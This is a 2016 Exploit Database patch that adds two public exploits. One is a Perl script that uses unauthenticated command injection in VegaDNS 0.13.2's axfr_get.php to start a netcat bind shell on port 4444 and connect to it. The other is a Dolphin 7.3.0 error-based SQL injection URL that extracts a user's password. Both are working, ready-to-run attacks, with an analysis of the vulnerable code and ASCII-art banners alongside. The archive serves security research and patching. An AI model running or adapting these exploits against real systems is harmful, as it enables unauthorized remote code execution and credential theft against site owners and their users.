From fdd9fd65e2548eefbb3bbfefe49e6452cb497a57 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 21 Sep 2016 05:07:40 +0000 Subject: [PATCH] DB: 2016-09-21 2 new exploits Dolphin 7.3.0 - Error-Based SQL Injection VegaDNS 0.13.2 - Remote Command Injection --- files.csv | 2 + platforms/php/webapps/40402.pl | 234 ++++++++++++++++++++++++++++++++ platforms/php/webapps/40403.txt | 25 ++++ 3 files changed, 261 insertions(+) create mode 100755 platforms/php/webapps/40402.pl create mode 100755 platforms/php/webapps/40403.txt diff --git a/files.csv b/files.csv index b6dea950e..cbb8474e0 100755 --- a/files.csv +++ b/files.csv @@ -20403,6 +20403,7 @@ id,file,description,date,author,platform,type,port 23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - sql_id Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0 23164,platforms/php/webapps/23164.txt,"myPHPNuke 1.8.8 - auth.inc.php SQL Injection",2003-09-20,"Lifo Fifo",php,webapps,0 23165,platforms/windows/dos/23165.txt,"Sun Java 1.x - XML Document Nested Entity Denial of Service",2003-09-22,"Sun Microsystems",windows,dos,0 +40403,platforms/php/webapps/40403.txt,"Dolphin 7.3.0 - Error-Based SQL Injection",2016-09-20,"Kacper Szurek",php,webapps,80 23166,platforms/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow Vulnerabilities",2003-09-21,"Bahaa Naamneh",windows,dos,0 23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 - Headers Prescan Denial of Service",1998-12-12,marchew,irix,dos,0 23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Elevation",2003-09-22,"Sebastian Krahmer",linux,local,0 @@ -21021,6 +21022,7 @@ id,file,description,date,author,platform,type,port 23802,platforms/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 - Arbitrary File Access",2004-03-11,"Donato Ferrante",linux,remote,0 23803,platforms/linux/remote/23803.txt,"Pegasi Web Server 0.2.2 - Error Page Cross-Site Scripting",2004-03-11,"Donato Ferrante",linux,remote,0 23804,platforms/cgi/remote/23804.txt,"cPanel 5/6/7/8/9 - Resetpass Remote Command Execution",2004-03-11,"Arab VieruZ",cgi,remote,0 +40402,platforms/php/webapps/40402.pl,"VegaDNS 0.13.2 - Remote Command Injection",2016-09-20,Wireghoul,php,webapps,0 23805,platforms/multiple/dos/23805.txt,"Targem Games Battle Mages 1.0 - Remote Denial of Service",2004-03-11,"Luigi Auriemma",multiple,dos,0 23806,platforms/cgi/webapps/23806.txt,"cPanel 5/6/7/8/9 - dir Parameter Cross-Site Scripting",2004-03-12,Fable,cgi,webapps,0 23807,platforms/cgi/webapps/23807.txt,"cPanel 5/6/7/8/9 - Login Script Remote Command Execution",2004-03-12,"Arab VieruZ",cgi,webapps,0 diff --git a/platforms/php/webapps/40402.pl b/platforms/php/webapps/40402.pl new file mode 100755 index 000000000..af4575aac --- /dev/null +++ b/platforms/php/webapps/40402.pl @@ -0,0 +1,234 @@ +#!/usr/bin/perl + $izd= qq{ + ██╗███████╗██╗ ██╗███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ + ██║╚══███╔╝██║ ██║████╗ ██║██╔══██╗ ██╔══██╗██╔══██╗██╔═══██╗██╔══██╗ + ██║ ███╔╝ ██║ ██║██╔██╗ ██║███████║ ██║ ██║██████╔╝██║ ██║██████╔╝ + ██║ ███╔╝ ██║ ██║██║╚██╗██║██╔══██║ ██║ ██║██╔══██╗██║ ██║██╔═══╝ + ██║███████╗╚██████╔╝██║ ╚████║██║ ██║ ██████╔╝██║ ██║╚██████╔╝██║ + ╚═╝╚══════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ + };$vg=qq{ + ▀ ▐░░▄ ▄▄▄▄▄▄▄ + ▀▀ ▄░ ▐▀▄▀▄ ▄▄▓▓▓▒▒▒▒▒▒▓▓▄ + ▀▀▀ ▐▄▄░ ▀▐▄ ▄▀▄ ▄ ▄▄▀▀▀ ▀▀▓▓▓▓▒▒░▒▓▓▌ + ▀ ▄ ▐▀▄ ▀▄░ ▄▄░░ ▀▓▓▓▓▓▓▓▓▓▌ + ▐▀▄▀▄ ▀▀▄▀▄ ▓▌░░ ▄▄▐▓▀▓▓░▀▓▓▓▌ + ▀▄▀▄▀▄░ ▐▀▄▀▄ ▐▓▒▄▄ ░▓▀ ▐▀▄▀▒▄▄▒▀▓▓▓▄ ▄▄▄▓▓▓▓▄▄▄ + ▀ ▀▄▀▌▄░ ▀▄▒▄ ▐▀▓▓ ░░ ▒░░ ▀▀▒▒▒▓▓▒░░░ ░░▒▒▄ + ▀ ▀ ▐▌ ░█░ ▒▌▐▀▄░▄ ▒░▒░░ ░░▒░ ░░▓ + ▐▄ ░░░ ░▒░░▒▌ █▄▒░▄ ▄▓▒░ ▐░░ ░░░▒░ ░░ + ▓▓░▄▓ ░▒░ ░░▐▓ ██▓▓▓▓▓░▄▄ ▐░░░▒▄▒░░░ ░ ░░░░ + ▀█▓▒▓▓ ░░░░ ░█▒▓▒▒▒▒███▒█▒▒░▒░▐▓▒░░░░░░░ ░ ░░▒▒▒░▒ + █░░ ░▒▒░░█▒▒░░░░░ ░░░░░▐▓▒░░░ ░░░ ░░░▒▒▒█░ ░▒▒ + ▐▒▒▒ █▒▓▌░░░ ░░░▒▒▒░░░░▒▓▓▒██▀▀░░ ░░ ░ ░░▒░░░ ░▒ + ▓▒░░▐▒░ ░▓ ██▌░░░▄▒▒░░▒▒▒░▒▒▓▓░░ ░░░░▒▄░░▒░░ ░▒ + ▓▒ ░▒▒▒█ ░▒▓ ▐▒▓░▒▒░ ▐░░ ▀▒▒▒░░░ ░ ▐░░▒▒▒ ░ ░ + █░▀▒▒▓▓▓▒▒░░▓ ▄▒░ ▀▒░░░░ ░ ░░░░░ ░░▒▒▒ ░ ▒▒ + ▀▓▓▀░▓▌▒░▒ ░▒▓▓▓▒▒▒░░░░ ░ ░░▒▒░ ░ ░░▒ + ▀▀▓▓▌▀░ ░ ░▐▓▓▓▒▓▓▓▄░░░▄ ▐░░░▒▒▒▀ ▐░▒▄░ ▐░░░▒ + ▐▒▒░░▄▓▓░▌ ░▒▒▓▓▓▓▒░░░ ░▒░▒▓▒▒░▒░░░░░▒░ ░░▒▒▒▓ + ▀▓▓▀▒▄░░░░░ ░▒▒▓▓▌▀▀▓▓▄▓▒▓░░▒▒░░░▒▓▒▓▓▀▀▀▀▀▀▀▀▀▓▓▄ + ▓▒░░░▄ ░░▒▓▀ ▀▓▓▓▒▒▓▓▓▓▀░░▒▒▒▀▓▓▓▓▀▀▀▀▓▓ + ▀▓▄▒▒▒░░░▒▓ ▐▓▓▓▓▓▒▒▒▓▓▀▒▒▒▀▀░░░░░▒▒▒▓▓▓▄ + ▀▀▀▀ ▀ ▐▓▓▓▀▀▀▀░░░░▒░░▒▒▒▓▓▓▓▒▀▀▀▓▓▌ + ▄▓▓▓▓▀▀▓▓▓▓▓▓██▀▀▀░░░░░ ▒ + ▓▒▒▓▌░░░░░░░▒▌░░░░ ░ ░ ▀ ░▄ + ▓▓▓▓▒▌▄░▒▒▒▒▓▒░░░░▀ ░░░ ░░░▒▌ + ▄▓▀▀░░░▒▒▄▒▒▓▓░░▄▒░░░▄▄▄▄ ░░░░░▐░ + ▄▐█▒ ▒░▒▒▒▒░░▓▓▓▒▓▓▓▒▒▒▀░░▀ ▀ ░░▒▌ + ▄▓▒▒░░░░░░▒▒▒▒▒░▒▓▓▓▓▓▓▓▒▒░ ░ ░ ▒▒█▀ + ▐▓▒░░░░░░░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▒▌ ░ ▐░ ░ ░▒ + ▐▒░░░░░░▒▒▒▒▒▒░░▓▓▓▓▓▓▓▓▓▓▓▒▌░ ░ ▐░░░ ░█ + ▒█░░░░░░▒▒▒▒░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▌ ░ ▐░░░ ░░▒ + ▐▓▒░▒░░░░░▒▒▒░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒▒░░ ░░░░ ░░▒ + ▄▓▒▒▒░░░░░░░░░░░▓░▓▓▒▓▓▓▓█▀▒▓▓▓▓▓▓▓▓▒░ ░░░░ ░░ + ▄▒░░░░ ░░░░▒▒▓▓▓▓██▌▐▓▓▓░░▓▓▌░▓▓▓▓▒░ ░ ░░░░ ░░▒ + ▒░░░░░░▒▒▓▓▓▓▓▓▓█ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ▐▒▌ + ▒▀░░░▒░░▓▒▓▓▓▓▓▌▀ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ░▒▌ + ▓ ░▒░░░▀▀▒▓▓▓▓▓▌ ▐▓▓▓ ░░░░░░▓▓▓▓▒░ ░ ░ ░ ░▒▒▌ + ▓▓▒░▒░░▒▒▒▓▓▓▓▓▓▌ ▀▓▓▓▓▓▓▓▓▒░ ░░░ ░▄░▒▓▌ + ░ ▀▒▓▓▓▓▓▓▓▓▓▌▀▀ ▒░ ░ ░░▓▓▄ + ░ ▓ ▓▒░ ░░▒▀▒░▒▄ + ▄ ░ ▀ ▓▒░░▄░░░░░▀░░░▌░░▒ + ░ ▄▄▀ ▀▒▒▒▒▒▄ ▄░░░░ ▀▀ + ░░░ ▓▓▓▒▒▓▄░░ ░ ▐░▄ ░ + ░ ░▀░░ ▀▀▒▒▒▒▀ ▀▒ ▄ + ▄▄▄▄▄▄ ▄▀▒▓▌▄ ▀▄ ░ ░ + ▓▓▓▓▌▄ ▄▓▓▓▓▓▓▓ ▒ ▄ ░ ▄ + ▓▒▒▓▓▓▓▓▓▓▓▒▓▓▓▓▓ ░ ▀▓ ▄ + ▓▒▒▓▓▓▓▓▓▒▓▓▓▓▓▀ ░ ▀▄░▒▌▄▄ + ▄▄▄▓▓▓▓▓▓▓▓▓▓▓███▀ ▄▓▄▄▄▄▄▒▓▓▓▓▄ + ▄▓▓▓▓▓▓▓▓▓▒▓▓▓▓▓█ ▐▓████▓▓▓▓▓▓▒▓▓ +▓▓▓▓▄▄▄▄▓▓▓▓▓▓▓█ ▐▓░░░▒▓▓▓▓▒▓▓ + ▐▓▓░▒▓▓▓▓▓▓▓ + ▐▓▓▓▓▓▓▒▒▓▌ + ▓▓▓▓█▒▒▒▒▒▒▒▓▓▌ + ██▒░░░░░░░▓▓███ + + };$b=qq{ + ██╗ ██╗███████╗ ██████╗ █████╗ ██████╗ ███╗ ██╗███████╗ + ██║ ██║██╔════╝██╔════╝ ██╔══██╗██╔══██╗████╗ ██║██╔════╝ + ██║ ██║█████╗ ██║ ███╗███████║██║ ██║██╔██╗ ██║███████╗ + ╚██╗ ██╔╝██╔══╝ ██║ ██║██╔══██║██║ ██║██║╚██╗██║╚════██║ + ╚████╔╝ ███████╗╚██████╔╝██║ ██║██████╔╝██║ ╚████║███████║ + ╚═══╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═══╝╚══════╝ + + + ██████╗ ███████╗███╗ ███╗ ██████╗ ████████╗███████╗ + ██╔══██╗██╔════╝████╗ ████║██╔═══██╗╚══██╔══╝██╔════╝ + ██████╔╝█████╗ ██╔████╔██║██║ ██║ ██║ █████╗ + ██╔══██╗██╔══╝ ██║╚██╔╝██║██║ ██║ ██║ ██╔══╝ + ██║ ██║███████╗██║ ╚═╝ ██║╚██████╔╝ ██║ ███████╗ + ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝ + + + ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ ██████╗ ██╗ ██╗ + ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ ██╔══██╗╚██╗ ██╔╝ + █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ██████╔╝ ╚████╔╝ + ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══██╗ ╚██╔╝ + ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ██████╔╝ ██║ + ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ + + + ▄ + ▄█▀ ▀█▄▄ + ▄▄▓▀▀ ▀▓▄▄ + ▄▓▓▀ ▀█▓▄ + ▄▓▓▀ ▀▓▓▓▄ + ▄▓▓█▀ ▀▓▓▄▄ + ▄▓▓▓▀ ▀▓▓▓▄ + ▄▓▓▓▀ ▀▓▓▓▓ + ▓▓▓▓▀ ▀▓▓▓▓▄ + ▓▓▓▓█ ▀▓▓▓▓ + ▐▓▓▓▀ ▓▓▓▌ + ▓▓▓▌ ▐▓▓▓ + ▓▓▓▌ ▄▓▓▓ + ▓▓▓▓ ▄▓▓▓ + ▓▓▓▓▓▓▓▓▓▓██ ██▓▓▓▓▓▓▓▓▓▓ + ▀▀▀▀ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▀▀█ + ▄▄▓▓▓▓▓▓▓▓▓▓▓████▓▓▓▓▓▀ ▓▓▓▓▓████▓▓▓▓▓▓▓▓▓▓▓▄▄ + ▄▓▓▓▓█▀▀▀ ▓▓█ ▐▓▓ ▀▀▀█▓▓▓▓▓ + ▓▓▓ ▐▓█ ▀▓▌ ▓▓▓ + █▓▌ ▓▀ ▌ ▀▓ ▐▓▓ + ▀▓ ▄ ▄▀ ▐ ▌ ▓▓ ▐▄ █ ▀▓▄ ▄▌ ▓▀ + █ ▀▓▄ ▄▓█ ▄▓ ▐▓▓▌ █▓ ▀▓▄▄ ▄▓▀ ▓ + ▄▌ █▓▓▓▓▓▀ ▓▓▓▄▓▌▐▓▄▄▓▓ ▀▓▓▓▄▓▓▀ ▐▄ + ▓▓ █▀▀ ▀█▀ ▀▓ + ▓▓ ▄ ▄▀ ▄ ▄ ▓▓ + ▓▓▓▄ ▄▓▀ ▄█ ▄ ▄ ▀▄ ▀▓▄ ▓▓▓ + ████▀▀▀▀▀▀▀▀▀ ▓▀ ▄ ▄ ▓ █ ▓ ▀▀▀▀▀▀▀▀▀████ + ▄▓▀ ▓ ▄▌▐ ▐ ▌ ▌▐▓ ▓ ▓▄ + ▄▓ ▄▄▓▌▐▓ ▐ ▓ ▓ ▓ ▐▄ ▌ ▓▌▐▓▄▄ ▓▓ + ▓▓▓█▀▀ ▀█▓▓▌ ▓ ▐▓ █▌ ▓ ▓▓█▀ ▀▀█▓▓▓ + █▀ ▀ ▐▓▄▓▌ ▐▓▄▓▌ ▀ ▀█ + ▀ ▀▀ + + + ___ .___ .______ ._______._____ .___.__ ._______ .____ .___ +.___ | |: __|: __ \ : .____/:_ ___\ : | \ : .___ \ | |___ | | +: | /\| || : || \____|| : _/\ | |___| : || : | || | || | +| |/ : || || : \ | / \| / || . || : || : || |/\ +| / || || |___\|_.: __/|. __ ||___| | \_. ___/ | || / \ +|______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/ + : : :/ : :/ + : : : + + };$g=qq{ + + ██████╗ ██████╗ ███████╗███████╗████████╗███████╗ + ██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝ + ██║ ███╗██████╔╝█████╗ █████╗ ██║ ███╔╝ + ██║ ██║██╔══██╗██╔══╝ ██╔══╝ ██║ ███╔╝ + ╚██████╔╝██║ ██║███████╗███████╗ ██║ ███████╗ + ╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝ ╚═╝ ╚══════╝ + +To all the people with mad skills who share their knowledge: + + TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO, + mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan, + lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil, + laughing_mantis, g0tm1k, nmrc, and many many more.... + + };$a=qq^ + + █████╗ ███╗ ██╗ █████╗ ██╗ ██╗ ██╗███████╗██╗███████╗ + ██╔══██╗████╗ ██║██╔══██╗██║ ╚██╗ ██╔╝██╔════╝██║██╔════╝ + ███████║██╔██╗ ██║███████║██║ ╚████╔╝ ███████╗██║███████╗ + ██╔══██║██║╚██╗██║██╔══██║██║ ╚██╔╝ ╚════██║██║╚════██║ + ██║ ██║██║ ╚████║██║ ██║███████╗██║ ███████║██║███████║ + ╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝╚═╝╚══════╝l + +VegaDNS is a tinydns administration tool written in PHP to allow easy +administration of DNS records through a web browser. +-- http://www.vegadns.org + + +The file axfr_get.php allows unauthenticated access and fails to correctly +apply input escaping to all variables that is based on user input. This +allows an attacker to inject shell syntax constructs to take control of the +command execution. + +The following code from axfr_get.php shows how the variable $file becomes +tainted trough the $domain variable which is tainted from direct user input. +The application tries to prevent this by escaping the $domain and $hostname +variables, but fails to escape the $file variable. + +---------------------------cut--------------------------- + * NOTE: + * This functionality ONLY exists outside of the main application + * because tcplient kept dying fatally due to file descriptor 7 + * being unavailable, which only occurs AFTER session_start() is + * called. + * + */ +require_once 'src/config.php'; +// CHECKS +// Make sure the hostname was given +if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") { + echo "ERROR: no hostname given\n"; + exit; +} +// Make sure that some domains were given +if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") { + echo "ERROR: no domain was supplied\n"; + exit; +} +$domain = $_REQUEST['domain']; +$hostname = $_REQUEST['hostname']; +$rand = rand(); +$file = "/tmp/$domain.$rand"; +$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1"; +exec($command, $out); +---------------------------end--------------------------- + + ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ + ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ + █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ + ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ + ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ + ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ + ^; + +print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n"; +print " "."=" x 50 ."[justanotherhacker.com]==\n"; +&usage if ($ARGV[0] !~ m!.+://([^/:]+)!); +$h=$1; +print " . . . Locating netcat\n"; +$cmd='which+nc'; +$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev"; +$z=`curl -s -k '$t'`; +if ($z !~ m{/nc}) { + print " ! ! ! netcat not found! Manual exploitation required:\n"; + print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n"; + exit 1; +} +print " . . . netcat found: $z\n"; +print " . . . Performing IZUNA DROP!\n"; +# ← · ↑ · → · ↓ · ↖ · ↗ · ↘ · ↙ +print " ↓ ↓ ↑ *k* → → *p*\n"; +$cmd="$z+-e+/bin/sh+-lp+4444"; +$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev"; +$z=`curl -m 3 -s -k '$t &'`; +print $vg."\n"; +print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n"; +system("nc -v $h 4444"); +sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit; \ No newline at end of file diff --git a/platforms/php/webapps/40403.txt b/platforms/php/webapps/40403.txt new file mode 100755 index 000000000..1861955cc --- /dev/null +++ b/platforms/php/webapps/40403.txt @@ -0,0 +1,25 @@ +# Exploit Title: Dolphin 7.3.0 Error Based SQL Injection +# Date: 20-09-2016 +# Software Link: https://www.boonex.com/ +# Exploit Author: Kacper Szurek +# Contact: http://twitter.com/KacperSzurek +# Website: http://security.szurek.pl/ +# Category: webapps + +1. Description + +`$_REQUEST['key']` is not escaped inside `actions.inc.php`. + +http://security.szurek.pl/dolphin-730-error-based-sql-injection.html + +2. Proof of Concept + +http://dolphin/flash/XML.php?module=chat&action=RayzSetMembershipSetting&id=1&_t=41920&key=' UNION select 1, exp(~(select*from(SELECT Password FROM profiles WHERE ID=1)x)); -- a + +which is rendered as: + +Database access error. Description: DOUBLE value is out of range in 'exp(~((select '%password_here%' from dual)))' + +3. Solution: + +Update to version 7.3.1 \ No newline at end of file